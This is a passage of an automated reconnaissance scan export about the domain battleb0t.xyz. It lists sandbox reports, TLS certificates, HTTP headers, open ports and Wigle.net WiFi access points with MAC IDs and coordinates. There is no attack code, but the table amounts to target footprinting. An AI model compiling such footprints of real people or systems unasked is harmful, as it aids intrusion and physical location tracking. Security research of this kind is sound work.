was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/70 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63f84e0cf084a4ebbd09e40f', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.110.153'], u'sha256': u'f8d347492a1f6c9b93dc2f32787a5f977924a39f1b3b780e41308e2da9cde63e', u'sha512': 
u'2a79b0f20b074cf0ee05cae5de8129f8e82728b59771926ef761f5db4c7972c16b093a38e08ce49a784934174b18c7b66aadf02caef3d81f3be87dacb6012134', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://ovolve.github.io./', u'submission_id': u'63f84e0df084a4ebbd09e410', u'created_at': u'2023-02-24T05:41:33+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-24T05:41:33+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'190362034693d3992c7a6e770f7f7b1f', u'network_mode': u'default', u'processes': [], u'sha1': u'a14c41f95cb25b4fba550658bd8036aa7eb96164', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'ovolve.github.io', u'ovolve.github.io.'], u'extracted_files': [], u'type_short': []}] | 185.199.110.153 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-l.github.io |
| 2023-05-12 02:54:48 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 34.148.97.127 |
| 2023-05-12 02:54:23 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5ddd7eab1d10af-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.97.1 |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:80 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 172.67.168.252 |
| 2023-05-12 02:44:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cdn-185-199-110-153.github.com | 185.199.110.153 |
| 2023-05-12 02:44:39 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | portainer.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d5:98:ae:2a:84:a2:19:ac:80:9a:6c:74:76:20:f8:3f:d8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:01 2022 GMT
Not After : Feb 15 09:44:00 2023 GMT
Subject: CN=portainer.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6D:D8:A8:24:70:8B:8F:0C:4D:0C:6C:1A:D9:1A:9A:75:25:E5:1A:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:portainer.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:01.511 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 10:44:01.990 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:01:36:26:A1:14) | 50.1188, 8.6843 |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.3): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | logitec-a53c1d (Net ID: 00:01:8E:A5:3C:1C) | 50.1188, 8.6843 |
| 2023-05-12 02:55:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://bit.ly/3gxx5yk', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ec8_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ec8_ConnHashTable<3784>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_ec8_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ec8_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3784"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_ec8_IE_EarlyTabStart_0xc6c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ec8_IESQMMUTEX_0_519"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.94.37.140:443"\n "3.5.21.21:443"\n "104.196.30.220:443"\n "104.16.123.175:443"\n "54.147.12.123:443"\n "23.36.63.240:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/6d548268b2fe4c93b1b74262c8515b07?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /resources/6d548268b2fe4c93b1b74262c8515b07?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n 
"GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 
1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: 
"mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/6d548268b2fe4c93b1b74262c8515b07 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/6d548268b2fe4c93b1b74262c8515b07?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', 
u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "D2684IUR.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D2684IUR.txt]- [target | 104.196.30.220 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:05:12.050 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 24 04:05:12.068 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:53:56 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["FA9A:7823:2111191:32C49C6:645C9D43"], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683791171.466843,VS0,VE24"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["c2c6815651c463b5fe5f6c442c782301daedbf1f"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-kigq8000156-CHI"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8001::153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wile (Net ID: 00:06:25:C6:1D:77) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:58:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'34.148.97.127', u'34.148.97.127', u'104.16.88.20', u'172.67.169.247'], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://www.trustsign.com.br/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.trustsign.com.br"\n "ocsp.pki.goog"\n "o.ss2.us"\n "crl.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "crls.pki.goog"\n "crl.rootca1.amazontrust.com"\n "crl.rootg2.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:80"\n "34.148.97.127:443"\n "142.250.217.72:443"\n "142.250.217.106:443"\n "108.139.0.96:443"\n "104.16.88.20:443"\n "172.67.169.247:443"\n "142.250.217.99:80"\n "108.138.245.197:80"\n "108.139.0.211:80"\n "108.139.0.15:80"\n "142.251.33.110:80"\n "108.138.245.171:80"\n "108.138.245.125:80"\n "142.251.211.238:443"\n "142.250.217.99:443"\n "96.6.232.137:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file 
"urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarE40E.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_bd0_ConnHashTable<3024>_HashTable_Mutex"\n "IsoScope_bd0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_bd0_IE_EarlyTabStart_0xd60_Mutex"\n "IsoScope_bd0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3024"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_bd0_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bd0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabE40D.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', 
u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVQ_1_.woff" has type "Web Open Font Format TrueType length 20712 version 1.1"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003832]\n "banner-contact-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 1920x980 frames 3"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003024]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003832]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003832]\n "TarE40E.tmp" has type "data"- Location: [%TEMP%\\TarE40E.tmp]- [targetUID: 00000000-00003832]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00003832]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- 
